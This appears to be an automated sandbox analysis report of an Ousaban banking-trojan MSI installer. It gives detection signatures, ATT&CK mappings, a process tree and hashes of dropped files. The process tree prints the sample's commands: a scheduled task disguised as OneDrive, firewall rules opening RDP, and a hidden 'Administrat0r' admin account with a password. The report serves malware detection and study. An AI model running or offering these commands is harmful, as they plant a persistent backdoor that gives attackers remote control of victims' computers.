Analysis

  • max time kernel
    100s
  • max time network
    98s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    23-12-2021 10:51

General

  • Target

    seucartao0021 0iictl3q h6ozq5.msi

  • Size

    4.0MB

  • MD5

    04573ca4c50c5c352ec0859d6a14953a

  • SHA1

    1a6780e61a658511f141fa8305ed9a9f318f5518

  • SHA256

    57675d518613f20edc235c2975eadba7aa15d19aa460df03b443c99cff0d26d1

  • SHA512

    d2ac8b26969f25b9c4da413a54118bcfc181dd2bffdabc771119fb5837825d560807862ea4a75f0985b0e2c261d9678fc18a4975bb8c24399e5e248362d9664d

Malware Config

Signatures

  • suricata: ET MALWARE Ousaban Banker Checkin M1

    suricata: ET MALWARE Ousaban Banker Checkin M1

  • suricata: ET MALWARE Ousaban Banker Checkin M2

    suricata: ET MALWARE Ousaban Banker Checkin M2

  • suricata: ET MALWARE Ousaban Banker KeepAlive

    suricata: ET MALWARE Ousaban Banker KeepAlive

  • suricata: ET MALWARE Ousaban Banker KeepAlive Response

    suricata: ET MALWARE Ousaban Banker KeepAlive Response

  • suricata: ET MALWARE Ousaban Banker Server Response M1

    suricata: ET MALWARE Ousaban Banker Server Response M1

  • suricata: ET MALWARE Ousaban Banker Server Response M2

    suricata: ET MALWARE Ousaban Banker Server Response M2

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 23 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs net.exe
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\seucartao0021 0iictl3q h6ozq5.msi"
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1628
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding A5519FA3DFDDF8DBC1A7271889AD20C1
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:560
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" process call create 'C:\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe'
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:672
  • C:\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe
    C:\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe /SC minute /MO 2 /IT /RU %USERNAME%
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1584
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe /SC minute /MO 2 /IT /RU Admin
        3⤵
        • Creates scheduled task(s)
        PID:856
    • C:\Users\Admin\CtGel FWIN\IBGDDHhfx.exe
      "C:\Users\Admin\CtGel FWIN\IBGDDHhfx.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies WinLogon
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:604
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        3⤵
          PID:1696
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=udp localport=3389 profile=any action=allow
          3⤵
            PID:1276
          • C:\Windows\system32\net.exe
            net user Administrat0r "123mudar" /add
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1576
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 user Administrat0r "123mudar" /add
              4⤵
                PID:1760
            • C:\Windows\system32\net.exe
              net localgroup Administradores Administrat0r /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:672
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administradores Administrat0r /add
                4⤵
                  PID:380
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                3⤵
                  PID:1292
                • C:\Windows\System32\reg.exe
                  C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
                  3⤵
                    PID:920
              • C:\Windows\system32\LogonUI.exe
                "LogonUI.exe" /flags:0x0
                1⤵
                  PID:2012
                • C:\Windows\system32\LogonUI.exe
                  "LogonUI.exe" /flags:0x1
                  1⤵
                    PID:1876

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Execution

                  Scheduled Task

                  1
                  T1053

                  Persistence

                  Modify Existing Service

                  1
                  T1031

                  Registry Run Keys / Startup Folder

                  1
                  T1060

                  Winlogon Helper DLL

                  1
                  T1004

                  Scheduled Task

                  1
                  T1053

                  Privilege Escalation

                  Scheduled Task

                  1
                  T1053

                  Defense Evasion

                  Modify Registry

                  2
                  T1112

                  Discovery

                  Query Registry

                  1
                  T1012

                  Peripheral Device Discovery

                  1
                  T1120

                  System Information Discovery

                  2
                  T1082

                  Lateral Movement

                  Remote Desktop Protocol

                  1
                  T1076

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\CtGel FWIN\IBGDDHhfx.exe
                    MD5

                    27d741ef21a179bd96a0b4effefb24de

                    SHA1

                    adc940a2c909a6c23363516e727a0e798da038b4

                    SHA256

                    72c0a43a65d36ae7def98075b948c4991ae0f24af1e1f3360abaf843471879a1

                    SHA512

                    14c743f98f794dda0b729c2fb80d3d16435bd9035641079b748c70f34a2ee30f72cb89d5763e6fe3a0f819e25e2ac6c23e3cdc7c21c2be4b489e1ca09c0db33f

                  • C:\Users\Admin\CtGel FWIN\IBGDDHhfx.exe
                    MD5

                    27d741ef21a179bd96a0b4effefb24de

                    SHA1

                    adc940a2c909a6c23363516e727a0e798da038b4

                    SHA256

                    72c0a43a65d36ae7def98075b948c4991ae0f24af1e1f3360abaf843471879a1

                    SHA512

                    14c743f98f794dda0b729c2fb80d3d16435bd9035641079b748c70f34a2ee30f72cb89d5763e6fe3a0f819e25e2ac6c23e3cdc7c21c2be4b489e1ca09c0db33f

                  • C:\Users\Admin\CtGel FWIN\bass.dll
                    MD5

                    c5b3059004e2c7631915ec044f4e6c63

                    SHA1

                    dbcdc0aba1d9cf3396ba8ae00bb3671c85047fb2

                    SHA256

                    3cd00f456f51829eda119e0e133acc1e45a5930d61fc335a2e9aa688a836a24d

                    SHA512

                    3ed914fbfa4ff78fe98ade848e79c3e1e3b66eae83159b45725bf946f2b3cb9d4f805f719901928d9b52c20bc121b0552645fa6aba11ac0fcd5ade672f14f5ee

                  • C:\Users\Admin\CtGel FWIN\bass_fx.dll
                    MD5

                    165d4f9f36459fc0a3fcb35cdba8157a

                    SHA1

                    319081765b10dddb992a07d49e775756a261956c

                    SHA256

                    69feb34cd072ff05848dad76b21c61062aaf8c3d25bc01ad4214050d1732877a

                    SHA512

                    d34daa884914be6431c1d812c86430f49c19c8309cd2fa5b83ab9751fe3abefa724a4f681c38888a573c6a8ba6f5e9a52b4ca280809034ba5c9b0dd50f02a477

                  • C:\Users\Admin\CtGel FWIN\bassasio.dll
                    MD5

                    f50f353390a644effac1571168aa4ae2

                    SHA1

                    fe8659dfea0102bbcabf42a6c9f34a47094688e9

                    SHA256

                    ca912b59ff2ee3300c324959949e93ec99f997f907d708c2c4ce83eda2dcf087

                    SHA512

                    f10a127d0c8eca05eaf797eced80749967b23a0afbef9db86bcd25f9b8058125f1da2b9e970d6eb103c92927783da77af3aead74bc25f53d40e3493dd3823e24

                  • C:\Users\Admin\CtGel FWIN\bassmix.dll
                    MD5

                    b47858d3d3147f64756e6cc8f187683b

                    SHA1

                    e8bbebf61ade86a1396e5c5cdaf38531a05d09b6

                    SHA256

                    441ca8e10de3624916aca5e962be3900955c14e2ade98b63c1ed246eb07034d7

                    SHA512

                    75e4728dd86cee07c183a58d8075638b55ee22b861e9ce0b3f3a987b799f6a13dc9d3d25ce719ca4de3dadb50aa87eb290dd73b0aeaaa8381431a7b078f3bb39

                  • C:\Users\Admin\CtGel FWIN\basswasapi.dll
                    MD5

                    f807bb3e88dd976a641ebb743e1b398d

                    SHA1

                    231e49284b4d7d3c91c60aed93a98d75d1ca633f

                    SHA256

                    0e953a58f456a7a80cc551aaa67edfd7920c5e47441a8635654eaaab33ef606e

                    SHA512

                    9ae21899a9329e6762fa6ee173b75451693e9d8449085346fd66337337d109d516747a1274d65f91a88399b25c339f8864c07ae65f4bf345468be504fb3e44c0

                  • C:\Users\Admin\CtGel FWIN\radioboss_taglib.dll
                    MD5

                    a2d06bdc0878c1fb72a488d2eda501fe

                    SHA1

                    410314dd5308397d234f162e2dd8ee1a5e9eb070

                    SHA256

                    1d6a37e98c564bbf225c296ce6ec99ba6c123319fc575317a04875874e721aa3

                    SHA512

                    367c1ae2d75ee0af74c4d417c96d50cf2434de8f5201436fa6cac6cc79d9515963212a8d5c28c8e24b064b10336f64dd5d88adf8454d62e2dc393187ec311495

                  • C:\Users\Admin\CtGel FWIN\win_sparkle_check_updatel
                    MD5

                    04a1af8fc372f2f5a18f4d61da3fbc11

                    SHA1

                    63dac44ee7991af912f97c025937c2f554bda56e

                    SHA256

                    14def3471b4d6ca61b5c8b201e7b0b37158df40c312fddc7fcc7ddd358bb6f2e

                    SHA512

                    2f0c62e7977ea779ef8eabdcfacb528962e8b35d8c1c3ac14153be123e0b11e5f94f927bdea8f16ae9e2af96ba818117b19cee2e49d904b934ebe90d98b8a446

                  • C:\Users\Admin\FGpchJGcNVnq\Host.hst
                    MD5

                    4f061b2838fa597aef455991da265af6

                    SHA1

                    abc5304aade1375e2a263469b23d4fb7cc7374d3

                    SHA256

                    112339859ea55a6cd05b8071ec69d15f8dd59547120ba971ec2e6f4f45758022

                    SHA512

                    b39c3bfb4a6501d59fd6ed1f4de279498e0c487237bf900f39ef77632dcd973d2f20ace02e85014af600f031b43d7b57fcae7d0030b48daf8aff3671d9948d79

                  • C:\Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe
                    MD5

                    5828ef796e249bc0ed7dbd98c5946393

                    SHA1

                    a0be6eced5f7d125d265749691dd597fa8cefdea

                    SHA256

                    7dfc162c156704589cd180d78e0b907429b5afcaa3f92867e54e7bfa97a47d41

                    SHA512

                    429a687134bea6d1260a4401c3848cb18ef80d4dadc33f4d4858adfbd7d3b31b5d4db86d9aa1b72d24df703915129c28c429aa0fb799bd70a064b6613d820e12

                  • C:\Users\Admin\FGpchJGcNVnq\MSVCP100.dll
                    MD5

                    e3c817f7fe44cc870ecdbcbc3ea36132

                    SHA1

                    2ada702a0c143a7ae39b7de16a4b5cc994d2548b

                    SHA256

                    d769fafa2b3232de9fa7153212ba287f68e745257f1c00fafb511e7a02de7adf

                    SHA512

                    4fcf3fcdd27c97a714e173aa221f53df6c152636d77dea49e256a9788f2d3f2c2d7315dd0b4d72ecefc553082f9149b8580779abb39891a88907f16ec9e13cbe

                  • C:\Users\Admin\FGpchJGcNVnq\MSVCR100.dll
                    MD5

                    bf38660a9125935658cfa3e53fdc7d65

                    SHA1

                    0b51fb415ec89848f339f8989d323bea722bfd70

                    SHA256

                    60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa

                    SHA512

                    25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

                  • C:\Users\Admin\FGpchJGcNVnq\groceryc.dll
                    MD5

                    fb3461ac1e498033b08247f1ebaa5ade

                    SHA1

                    e8e46582973c7bbceb2af8edbd70dc11068c0918

                    SHA256

                    16eebcae164bf362f3fb4376fd791bc43bf42bd7f07f13924015f134cec74666

                    SHA512

                    46b66742b556b3ec94b35eef736a17b109239900cd3e84f9af34f459076aadab56b769e3fe461492c4ef36a8f636c55de0656f20402f17903a252271ac6e7667

                  • C:\Users\Admin\FGpchJGcNVnq\libBasic.dll
                    MD5

                    371f6c89ec30bd992fafdda05df9c516

                    SHA1

                    c0b903b78111fdcb8d81d067ad89cf00f8fb1146

                    SHA256

                    d32ddb8457cfd53ce1a51c91ad987421ac52f34a1db09e5fcc712505d0308b8b

                    SHA512

                    d49ca194bfbcef4c4d590a21caf5b95b7742b18ab6dcc7e207de031203d71e975d2118afa9c468f6862b76576fa227c4eb935b4ddb0ddabc4c2b9295baf9eeca

                  • C:\Users\Admin\FGpchJGcNVnq\libI18n.dll
                    MD5

                    60c0f465dfd23344e9ad67cef6ef7ccb

                    SHA1

                    68de19bcdab5279af617b978f25d0f8391499461

                    SHA256

                    9cfd224ed08a300d1d19d5217b51ba05089fbf83c2dc33f5280266ff4e7d896f

                    SHA512

                    ea8c4742c120d46d6163959e15b5e544b9b008637d367a4153e86685d09f5397e1da0f729e9fbfdf0564cba625724261650869b25197b2e672718d4d79352755

                  • C:\Users\Admin\FGpchJGcNVnq\libRG.dll
                    MD5

                    28d3cd357afe7fb92de5c9da21d9847f

                    SHA1

                    c412d3f742f6d92092b002c0a09cc8fc7c8824ed

                    SHA256

                    27b69838e6cd434f678ab14ae2632cf503bf2c857de7bc3945b3936527261056

                    SHA512

                    931b94edf9d9d4a6d15796ac632229fe12dc526873907f31cdb6f58b7d2817543b4761dcd1bbfdcd0d09a8e5811f2b3d8c66a2283e99b7223bd504cdb9be271a

                  • C:\Users\Admin\FGpchJGcNVnq\libglog.dll
                    MD5

                    e384e66b1543ae6bf6ad5196b875a902

                    SHA1

                    f47e7693827a5f89680e250155362e620cb5bc8c

                    SHA256

                    a444930451e8bfc83d5a98d73da89d9350809fc939b21fcb74ed9b3db46d83b9

                    SHA512

                    56cafefcaaa705d81fbbddb52f6821b6cc3453991a1c864b050943156b1c6aabbe984b789d5322d4ab317f5a69b10db9528f989aafe2476ebbee4506d7e580eb

                  • C:\Users\Admin\FGpchJGcNVnq\libxml2-2.dll
                    MD5

                    d846fcef3669f657bac2081dff8b9a6e

                    SHA1

                    7f27542b885389554dba0d7d24228f5f1157f764

                    SHA256

                    022a970459ee81fd7b33ed34feab82f8b188d1df8f60b0757ae1b100867fdd2f

                    SHA512

                    7a70a22afa25c452504783c5377e373c312165cc2a130320ee683819a6fbbfeb3fb970283f725efbe0e8582b6b1c9041b528c0022abd60fce538782b01401177

                  • C:\Users\Admin\FGpchJGcNVnq\libzvc125.dll
                    MD5

                    6fb39a68c0c199866bf5e9ebfd30644e

                    SHA1

                    1039a686d7b39df59904e514f21e8832dee8611b

                    SHA256

                    bfd9c54035d0fd56b38c26352bc29af1b6ae6c867dac2e7a0ce1b5b517f90800

                    SHA512

                    f220a45d8e9d27aad574ee2208d12a1c01d7f18a38205d3528d854dab78591ebca98f7451a38440365a9f755f738178eb79e3b55ac542cd9495ca6fea2be32d0

                  • C:\Users\Admin\FGpchJGcNVnq\pthreadVC2.dll
                    MD5

                    01819c12d2b7a56ebc3cec57a59aee01

                    SHA1

                    554aa7bb916b7b6a754c3d60057a61de9eccde8b

                    SHA256

                    69a85cbb337aaf764d9c66d3035f0705def8818e64a2adf01b43b5eb54bd4953

                    SHA512

                    2647397f2d52a645d373d2170157ea4f718e9fe861c316f7b732fcdfac8b05b2f001acaf480cc8f4df0ce90c0254fbec5e02448377709746c9dbbca5c62cc00c

                  • C:\Users\Admin\FGpchJGcNVnq\win_sparkle_check_update_with_ui_and_install
                    MD5

                    7fb9eba5867190634a924adcf984e10d

                    SHA1

                    be9fe00d85e0f3db1a474671fb466678b9e854bc

                    SHA256

                    9a379c3abec8a6d334165b60134997ddd81d0d9f18020e3596ef94d02b8346c0

                    SHA512

                    24ad866e8e7d62ee6d0a051b62703bbc82d16107b2b0e03e8939ed61974e93c90d48088137afbb17a398c00477b915434509a6e3ee1ee8a6e68b5a61a316e6a9

                  • C:\Windows\Installer\MSIA332.tmp
                    MD5

                    9f1e5d66c2889018daef4aef604eebc4

                    SHA1

                    b80294261c8a1635e16e14f55a3d76889ff2c857

                    SHA256

                    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                    SHA512

                    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                  • C:\Windows\Installer\MSIA4F7.tmp
                    MD5

                    9f1e5d66c2889018daef4aef604eebc4

                    SHA1

                    b80294261c8a1635e16e14f55a3d76889ff2c857

                    SHA256

                    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                    SHA512

                    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                  • C:\Windows\Installer\MSIA537.tmp
                    MD5

                    0872fc86ddb1c0c51beab1deaaa80218

                    SHA1

                    abe143cfe0053d6e93c042815f020ff4714794bc

                    SHA256

                    99f2f155dfed73c33416e82ca6cd8f6dc66abbf50513a5e2a857d12e49504c60

                    SHA512

                    1b15ea0122d5adef9098381a2dc9659257ba13704fc4b51105c535044c94e370b9ea24e70c836e85cd0b4c9cc4dab63522c74af2ab913619984e86c27888a346

                  • C:\Windows\Installer\MSIF731.tmp
                    MD5

                    0872fc86ddb1c0c51beab1deaaa80218

                    SHA1

                    abe143cfe0053d6e93c042815f020ff4714794bc

                    SHA256

                    99f2f155dfed73c33416e82ca6cd8f6dc66abbf50513a5e2a857d12e49504c60

                    SHA512

                    1b15ea0122d5adef9098381a2dc9659257ba13704fc4b51105c535044c94e370b9ea24e70c836e85cd0b4c9cc4dab63522c74af2ab913619984e86c27888a346

                  • \??\PIPE\samr
                    MD5

                    d41d8cd98f00b204e9800998ecf8427e

                    SHA1

                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                    SHA256

                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                    SHA512

                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                  • \Program Files\Terminal Service 23122021\rdpwrap.dll
                    MD5

                    461ade40b800ae80a40985594e1ac236

                    SHA1

                    b3892eef846c044a2b0785d54a432b3e93a968c8

                    SHA256

                    798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                    SHA512

                    421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                  • \Users\Admin\CtGel FWIN\IBGDDHhfx.exe
                    MD5

                    27d741ef21a179bd96a0b4effefb24de

                    SHA1

                    adc940a2c909a6c23363516e727a0e798da038b4

                    SHA256

                    72c0a43a65d36ae7def98075b948c4991ae0f24af1e1f3360abaf843471879a1

                    SHA512

                    14c743f98f794dda0b729c2fb80d3d16435bd9035641079b748c70f34a2ee30f72cb89d5763e6fe3a0f819e25e2ac6c23e3cdc7c21c2be4b489e1ca09c0db33f

                  • \Users\Admin\CtGel FWIN\bass.dll
                    MD5

                    c5b3059004e2c7631915ec044f4e6c63

                    SHA1

                    dbcdc0aba1d9cf3396ba8ae00bb3671c85047fb2

                    SHA256

                    3cd00f456f51829eda119e0e133acc1e45a5930d61fc335a2e9aa688a836a24d

                    SHA512

                    3ed914fbfa4ff78fe98ade848e79c3e1e3b66eae83159b45725bf946f2b3cb9d4f805f719901928d9b52c20bc121b0552645fa6aba11ac0fcd5ade672f14f5ee

                  • \Users\Admin\CtGel FWIN\bass_fx.dll
                    MD5

                    a4f599543921e699fde94a2ddf4d6615

                    SHA1

                    def5e3d85e4068ac298b18041944d9d642691172

                    SHA256

                    b6638f6ca21a65225d8cd2f0d7d2b2c34825998c12b9f16b50827080cf6ea8b2

                    SHA512

                    2dafe354e0d14640ea1ca0c12e36f3d202d90883455c70cbf02d60d93b7f73f6e93a506d6f8a648c2a9b2fb95ef9786e73927af4fadc6f0768e6a2a14bfe22eb

                  • \Users\Admin\CtGel FWIN\bassasio.dll
                    MD5

                    f50f353390a644effac1571168aa4ae2

                    SHA1

                    fe8659dfea0102bbcabf42a6c9f34a47094688e9

                    SHA256

                    ca912b59ff2ee3300c324959949e93ec99f997f907d708c2c4ce83eda2dcf087

                    SHA512

                    f10a127d0c8eca05eaf797eced80749967b23a0afbef9db86bcd25f9b8058125f1da2b9e970d6eb103c92927783da77af3aead74bc25f53d40e3493dd3823e24

                  • \Users\Admin\CtGel FWIN\bassmix.dll
                    MD5

                    b47858d3d3147f64756e6cc8f187683b

                    SHA1

                    e8bbebf61ade86a1396e5c5cdaf38531a05d09b6

                    SHA256

                    441ca8e10de3624916aca5e962be3900955c14e2ade98b63c1ed246eb07034d7

                    SHA512

                    75e4728dd86cee07c183a58d8075638b55ee22b861e9ce0b3f3a987b799f6a13dc9d3d25ce719ca4de3dadb50aa87eb290dd73b0aeaaa8381431a7b078f3bb39

                  • \Users\Admin\CtGel FWIN\basswasapi.dll
                    MD5

                    f807bb3e88dd976a641ebb743e1b398d

                    SHA1

                    231e49284b4d7d3c91c60aed93a98d75d1ca633f

                    SHA256

                    0e953a58f456a7a80cc551aaa67edfd7920c5e47441a8635654eaaab33ef606e

                    SHA512

                    9ae21899a9329e6762fa6ee173b75451693e9d8449085346fd66337337d109d516747a1274d65f91a88399b25c339f8864c07ae65f4bf345468be504fb3e44c0

                  • \Users\Admin\CtGel FWIN\radioboss_taglib.dll
                    MD5

                    a2d06bdc0878c1fb72a488d2eda501fe

                    SHA1

                    410314dd5308397d234f162e2dd8ee1a5e9eb070

                    SHA256

                    1d6a37e98c564bbf225c296ce6ec99ba6c123319fc575317a04875874e721aa3

                    SHA512

                    367c1ae2d75ee0af74c4d417c96d50cf2434de8f5201436fa6cac6cc79d9515963212a8d5c28c8e24b064b10336f64dd5d88adf8454d62e2dc393187ec311495

                  • \Users\Admin\FGpchJGcNVnq\JprZmiySPgWs.exe
                    MD5

                    5828ef796e249bc0ed7dbd98c5946393

                    SHA1

                    a0be6eced5f7d125d265749691dd597fa8cefdea

                    SHA256

                    7dfc162c156704589cd180d78e0b907429b5afcaa3f92867e54e7bfa97a47d41

                    SHA512

                    429a687134bea6d1260a4401c3848cb18ef80d4dadc33f4d4858adfbd7d3b31b5d4db86d9aa1b72d24df703915129c28c429aa0fb799bd70a064b6613d820e12

                  • \Users\Admin\FGpchJGcNVnq\groceryc.dll
                    MD5

                    fb3461ac1e498033b08247f1ebaa5ade

                    SHA1

                    e8e46582973c7bbceb2af8edbd70dc11068c0918

                    SHA256

                    16eebcae164bf362f3fb4376fd791bc43bf42bd7f07f13924015f134cec74666

                    SHA512

                    46b66742b556b3ec94b35eef736a17b109239900cd3e84f9af34f459076aadab56b769e3fe461492c4ef36a8f636c55de0656f20402f17903a252271ac6e7667

                  • \Users\Admin\FGpchJGcNVnq\libBasic.dll
                    MD5

                    371f6c89ec30bd992fafdda05df9c516

                    SHA1

                    c0b903b78111fdcb8d81d067ad89cf00f8fb1146

                    SHA256

                    d32ddb8457cfd53ce1a51c91ad987421ac52f34a1db09e5fcc712505d0308b8b

                    SHA512

                    d49ca194bfbcef4c4d590a21caf5b95b7742b18ab6dcc7e207de031203d71e975d2118afa9c468f6862b76576fa227c4eb935b4ddb0ddabc4c2b9295baf9eeca

                  • \Users\Admin\FGpchJGcNVnq\libI18n.dll
                    MD5

                    60c0f465dfd23344e9ad67cef6ef7ccb

                    SHA1

                    68de19bcdab5279af617b978f25d0f8391499461

                    SHA256

                    9cfd224ed08a300d1d19d5217b51ba05089fbf83c2dc33f5280266ff4e7d896f

                    SHA512

                    ea8c4742c120d46d6163959e15b5e544b9b008637d367a4153e86685d09f5397e1da0f729e9fbfdf0564cba625724261650869b25197b2e672718d4d79352755

                  • \Users\Admin\FGpchJGcNVnq\libRG.dll
                    MD5

                    28d3cd357afe7fb92de5c9da21d9847f

                    SHA1

                    c412d3f742f6d92092b002c0a09cc8fc7c8824ed

                    SHA256

                    27b69838e6cd434f678ab14ae2632cf503bf2c857de7bc3945b3936527261056

                    SHA512

                    931b94edf9d9d4a6d15796ac632229fe12dc526873907f31cdb6f58b7d2817543b4761dcd1bbfdcd0d09a8e5811f2b3d8c66a2283e99b7223bd504cdb9be271a

                  • \Users\Admin\FGpchJGcNVnq\libglog.dll
                    MD5

                    e384e66b1543ae6bf6ad5196b875a902

                    SHA1

                    f47e7693827a5f89680e250155362e620cb5bc8c

                    SHA256

                    a444930451e8bfc83d5a98d73da89d9350809fc939b21fcb74ed9b3db46d83b9

                    SHA512

                    56cafefcaaa705d81fbbddb52f6821b6cc3453991a1c864b050943156b1c6aabbe984b789d5322d4ab317f5a69b10db9528f989aafe2476ebbee4506d7e580eb

                  • \Users\Admin\FGpchJGcNVnq\libxml2-2.dll
                    MD5

                    d846fcef3669f657bac2081dff8b9a6e

                    SHA1

                    7f27542b885389554dba0d7d24228f5f1157f764

                    SHA256

                    022a970459ee81fd7b33ed34feab82f8b188d1df8f60b0757ae1b100867fdd2f

                    SHA512

                    7a70a22afa25c452504783c5377e373c312165cc2a130320ee683819a6fbbfeb3fb970283f725efbe0e8582b6b1c9041b528c0022abd60fce538782b01401177

                  • \Users\Admin\FGpchJGcNVnq\libzvc125.dll
                    MD5

                    6fb39a68c0c199866bf5e9ebfd30644e

                    SHA1

                    1039a686d7b39df59904e514f21e8832dee8611b

                    SHA256

                    bfd9c54035d0fd56b38c26352bc29af1b6ae6c867dac2e7a0ce1b5b517f90800

                    SHA512

                    f220a45d8e9d27aad574ee2208d12a1c01d7f18a38205d3528d854dab78591ebca98f7451a38440365a9f755f738178eb79e3b55ac542cd9495ca6fea2be32d0

                  • \Users\Admin\FGpchJGcNVnq\msvcp100.dll
                    MD5

                    e3c817f7fe44cc870ecdbcbc3ea36132

                    SHA1

                    2ada702a0c143a7ae39b7de16a4b5cc994d2548b

                    SHA256

                    d769fafa2b3232de9fa7153212ba287f68e745257f1c00fafb511e7a02de7adf

                    SHA512

                    4fcf3fcdd27c97a714e173aa221f53df6c152636d77dea49e256a9788f2d3f2c2d7315dd0b4d72ecefc553082f9149b8580779abb39891a88907f16ec9e13cbe

                  • \Users\Admin\FGpchJGcNVnq\msvcr100.dll
                    MD5

                    bf38660a9125935658cfa3e53fdc7d65

                    SHA1

                    0b51fb415ec89848f339f8989d323bea722bfd70

                    SHA256

                    60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa

                    SHA512

                    25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

                  • \Users\Admin\FGpchJGcNVnq\pthreadVC2.dll
                    MD5

                    01819c12d2b7a56ebc3cec57a59aee01

                    SHA1

                    554aa7bb916b7b6a754c3d60057a61de9eccde8b

                    SHA256

                    69a85cbb337aaf764d9c66d3035f0705def8818e64a2adf01b43b5eb54bd4953

                    SHA512

                    2647397f2d52a645d373d2170157ea4f718e9fe861c316f7b732fcdfac8b05b2f001acaf480cc8f4df0ce90c0254fbec5e02448377709746c9dbbca5c62cc00c

                  • \Windows\Installer\MSIA332.tmp
                    MD5

                    9f1e5d66c2889018daef4aef604eebc4

                    SHA1

                    b80294261c8a1635e16e14f55a3d76889ff2c857

                    SHA256

                    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                    SHA512

                    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                  • \Windows\Installer\MSIA4F7.tmp
                    MD5

                    9f1e5d66c2889018daef4aef604eebc4

                    SHA1

                    b80294261c8a1635e16e14f55a3d76889ff2c857

                    SHA256

                    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                    SHA512

